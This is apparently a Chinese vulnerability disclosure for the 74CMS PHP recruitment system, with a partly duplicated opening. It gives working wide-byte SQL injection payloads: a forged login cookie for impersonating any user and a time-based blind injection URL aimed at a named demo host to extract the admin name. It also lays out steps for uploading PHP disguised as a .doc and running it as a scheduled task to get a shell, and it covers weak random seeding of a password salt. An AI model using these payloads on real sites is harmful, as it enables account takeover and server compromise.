### 简要描述: 0x1 任意用户登录 0x2 盲注 0x3 后台拿shell 0x4 随机函数问题 ### 详细说明: 0x1 任意用户登录 user/login.php ``` elseif((empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype'])) && $_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid']) { if(check_cookie($_COOKIE['QS']['username'],$_COOKIE['QS']['password'])) { update_user_info($_COOKIE['QS']['uid'],false,false); header("Location:".get_member_url($_SESSION['utype'])); } else { unset($_SESSION['uid'],$_SESSION['username'],$_SESSION['utype'],$_SESSION['uqqid'],$_SESSION['activate_username'],$_SESSION['activate_email'],$_SESSION["openid"]); setcookie("QS[uid]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain); setcookie('QS[username]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain); setcookie('QS[password]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain); setcookie("QS[utype]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain); header("Location:".url_rewrite('QS_login')); } } ```...
### 简要描述: 0x1 任意用户登录 0x2 盲注 0x3 后台拿shell 0x4 随机函数问题 ### 详细说明: 0x1 任意用户登录 user/login.php ``` elseif((empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype'])) && $_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid']) { if(check_cookie($_COOKIE['QS']['username'],$_COOKIE['QS']['password'])) { update_user_info($_COOKIE['QS']['uid'],false,false); header("Location:".get_member_url($_SESSION['utype'])); } else { unset($_SESSION['uid'],$_SESSION['username'],$_SESSION['utype'],$_SESSION['uqqid'],$_SESSION['activate_username'],$_SESSION['activate_email'],$_SESSION["openid"]); setcookie("QS[uid]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain); setcookie('QS[username]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain); setcookie('QS[password]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain); setcookie("QS[utype]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain); header("Location:".url_rewrite('QS_login')); } } ``` include/fun_user.php ``` //检测COOKIE function check_cookie($name,$pwd){ global $db; $row = $db->getone("SELECT COUNT(*) AS num FROM ".table('members')." WHERE username='{$name}' and password = '{$pwd}'"); if($row['num'] > 0) { return true; }else{ return false; } } ``` 构造cookie如下 QS[uid] 2 QS[utype]1 QS[password]111111111111111111111 QS[username]%bf%27 or 1=1 %23 uid 为假冒用户的ID utype为用户类型 password任意 0x2 盲注 http://demo32.74cms.com//resume/resume-list.php?key=test00%bf')/**/and+if((select/**/admin_name/**/from/**/qs_admin/**/limit/**/0,1)=0x61646D696E,benchmark(1000000000,(select/**/1)),1)/**/%23 上面两个都是宽字节注入,如果你能猜出管理员密码,还能解出双重md5的话,还能猜出后台路径,继续看下面 0x3 后台拿shell 1.先关闭csrf防御功能 2.在hr工具箱中添加一个伪造的doc,内容为<?php phpinfo();?>,记下路径data/hrtools/2012/06/1339941553308.doc 3.在工具-计划任务中添加任务,脚本任务填../../data/hrtools/2012/06/1339941553308.doc 4.然后执行 0x4 随机函数问题(几乎可以无视,纯属个人YY) 在admin_common.fun.inc.php中有个$QS_pwdhash是在安装的时候赋值的,只要能猜出就可已不用解双重md5了。 这个$QS_pwdhash是由randstr生成 ``` function randstr($length=6) { $hash=''; $chars= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz@#!~?:-='; $max=strlen($chars)-1; mt_srand((double)microtime()*1000000); for($i=0;$i<$length;$i++) { $hash.=$chars[mt_rand(0,$max)]; } return $hash; } ``` 生成长度为6的随机数,mt_srand()播种一样,就会得到一样的随机数,所以我们最多要猜1000000次就可以了(蛋疼) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201206/18002720a9c4f625ce6dc471677b1b928dbf903c.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201206/18002720a9c4f625ce6dc471677b1b928dbf903c.jpg) [<img src="https://images.seebug.org/upload/201206/18002802f7eba9e17e7b9fbf0f3bc2f7585a94d5.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201206/18002802f7eba9e17e7b9fbf0f3bc2f7585a94d5.png)
